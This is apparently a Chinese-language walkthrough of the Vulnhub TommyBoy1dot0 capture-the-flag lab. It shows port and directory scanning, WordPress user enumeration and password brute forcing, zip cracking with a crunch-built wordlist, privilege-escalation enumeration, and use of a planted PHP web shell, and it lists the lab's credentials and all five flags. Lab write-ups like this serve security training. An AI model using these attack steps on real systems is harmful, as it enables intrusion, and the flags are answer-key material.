一、信息收集
1、主机发现
nikto whatweb arp-scan -l nmap -p- -n -sC -sV 192.168.66.147
2、端口扫描
nmap -sS -sV 192.168.66.147 nmap -p- -Pn -sC -sV -n 192.168.66.147 whatweb -v 192.168.66.147 nikto -h http://192.168.66.147
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to Callahan Auto
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
ok,这里扫出来两个端口,一个8000端口一个22端口,我们先看看8000端口有什么东西
3、目录扫描
信息量真实巨大
dirb http://192.168.66.147
gobuster dir -u http://192.168.66.147:8000 -t30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
dirsearch -u http://192.168.66.147:8008/ -e * -i 200
nikto -h 192.168.66.147 -p 8000
4、外网打点
1、flag1
这里上来一个下马威,让我们回复备份文件
这里源码有些信息,我们看看什么情况
这里追踪一下内容,给了我们一些线索
这里追踪到这个信息,但是无法建立数据库连接
找到了个robots.txt文档
我们挨个儿访问看看什么情况
这里有个flag相关信息,来看看什么情况
这里应该是找到了第一个flag
2、flag2
80端口都是无法访问,我们来看看8008端口吧
感觉像是ssh爆破,给了一个Nick和Steve Jobs的用户名
这里重启了几次才能访问wp这个站点,那我们就继续渗透了,然后这个是个wp站,我们扫一下,看看有没有什么信息
探测一下基础信息
wpscan --url http://192.168.66.147/ --enumerate u
这里让我们输入密码,说实话,这个密码有点眼熟。sup3rl33t尝试一下是不是这个密码,这个也可能是wp的登录密码
ok,这里找到了第二个flag
第二个flag也拿下了
3、flag3
这里用户有点多,我们尝试爆破,看看能不能登录,而且我们把sup3rl33t这个密码也尝试一下,别漏掉了
开扫
这里没爆破到密码,可能是要用其他方法吧
这里得到一张照片,可能是隐写吧,先下载看看
这里发现了一些问题,有一处ascii码,可能有关键信息
这里看了其他师傅的wp,会用到两个工具,一个是strings、一个是hash识别工具,我们看看什么情况
其实我们使用二进制打开工具也能看到或者图片属性里面也有
是md5加密,我们加密看看是什么东西
可能是账户或者密码,我们试试吧,找到了,是我们之前无法看到的文章
翻译一下看看啥情况
1、只有tom(大汤姆)有登录的密码 2、有一个 callahanbak.bak 的备份文件,需要你将其重命名为index.html 3、有一个ftp服务,放在一个大多数扫描器都扫不到的端口上,每过15分钟上线 4、nick重置了它的账号为,nickburns sup3rl33t这是nick的密钥
在我们登录了加密的文章后就能扫描到一个新的端口了,这里是ftp进行连接
ok,这里我们ftp连接到了65534端口,里面有个文档,我们看看是什么
淦,看的云里雾里的 这里看了其他师傅wp,说是通过手机访问,那我们就加一个ua头
这里改个包,换个ua头就行了
这里应该是扫了,扫描吧
dirsearch -u http://192.168.66.147:8008/NickIzL33t -H 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.11(0x17000b21) NetType/4G Language/zh_CN'
这是我第一次这样用,还能加UA头去扫的
wfuzz -u http://192.168.66.147:8008/NickIzL33t/FUZZ.html
-w 111.txt
-H "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/13.0 MQQBrowser/10.1.1 Mobile/15B87 Safari/604.1 QBWebViewUA/2 QBWebViewType/1 WKType/1"
页面化的dirbuster也是可以的
加上了手机的UA头即可访问
拿到了第三个flag
4、flag4
很抽象的提示
大汤姆,
您的密码库是受保护的(是的,你猜对了)一个PASSWORD!
因为你选择愚蠢的密码,如“password123”和“brakepad”I
强制新的密码要求你 . . . 13 字符宝贝!毛哈哈哈哈哈!!!
您的密码是您妻子的昵称“bev”(注意,它都是小写)加上以下内容:
*一个大写字符
* 两个数字
* 两个小写字母字符
* 一个符号
汤米男孩在剧院上映的那一年
是啊,胖子,这是很多要推的钥匙,但确保你把它们完全输入一个
大块好吗?嘿,“大块。一个大块打字大块。这很有趣。
LOL 系统
尼克
看来要用爆破了,理清一下逻辑,密码是13位,前三位是bev+大写字符+两个数字+两个小写字母字符+一个符号+1995
crunch 13 13 -t bev,%%@@^1995 > pass.txt
命令解释:
13 13 : 表示生成13个字符,如果是 7 13那么就代表从7位数开始生成,一直生成到13位数完,也就是(7-13个字符)
-t : template的缩写,表示使用模板(模式)来生成密码。
bev,%%@@^1995 : 模板字符串含义如下
, 表示包含任意一个大写字母(A-Z)
% 表示包含任意一个数字(0-9)
^ 表示特殊字符
@ 表示任意的小写字母(a-z)
查看具体代表的字符,可以这样使用,只是用一个符号来利用
fcrackzip -D -p pass.txt -u t0msp4ssw0rdz.zip
开始爆破
这是所有的账户密码
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money
TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding
Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat
Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.
Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
这是段很好用的代码,就是筛选包含tom的密码写入新的字典里
cat /usr/share/wordlists/rockyou.txt| grep tom > tom_rockyou.txt
wpscan --url http://10.10.10.192/prehistoricforest -e u -P tom_rockyou.txt
扫出来密码了,我们登录看看
这里的1938!!是我们之得到的密码的后缀Username: bigtommysenior,Password: fatguyinalittlecoat1938!!,这是ssh连接的账户密码
5、flag5
我们接下来应该把备份文件修改名称
uname -a
cat /etc/os-release # 没有lsb_release -a命令可以使用这个代替
sudo -l # 查看可以使用sudo的文件
find / -perm -4000 -print 2>/dev/null # 查找 SUID文件
ls -al /etc/cron* # 查看所有计划任务
find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息
ps -aux | grep mysql # 查看mysql是否在后台运行
netstat -tuln # 查看端口信息
这里有数据库的账户密码
find / -name 'NickIzL33t' 2>/dev/null
cd /var/thatsg0nnaleaveamark/NickIzL33t
cp /home/bigtommysenior/callahanbak.bak /var/www/html/index.html
这里页面可以正常访问了 然后我们找到了一个可以写入的文件,写一个shell
因为我们写入了shell,并且写了system函数,哪我门就可以利用该函数来执行命令 http://192.168.66.147:8008/NickIzL33t/P4TCH_4D4MS/uploads/shell.php?shell=cat%20+/.5.txt
首先进行命令执行然后再下载下来
wget 'http://192.168.66.147:8008/NickIzL33t/P4TCH_4D4MS/uploads/cmd.php?pass=cat%20/.5.txt' --header="User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/13.0 MQQBrowser/10.1.1 Mobile/15B87 Safari/604.1 QBWebViewUA/2 QBWebViewType/1 WKType/1"
cat 'cmd.php?pass=cat %2F.5.txt'
两种方式都可以得到flag
这里就是第五个flag了。猜测是拿着五个flag去解开有密码的压缩包
第一个flag:B34rcl4ws
第二个flag:Z4l1nsky
第三个flag:TinyHead
第四个flag:EditButton
第五个flag:Buttcrack
原文始发于微信公众号(泷羽Sec-朝阳):Vulnhub-TommyBoy1dot0
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论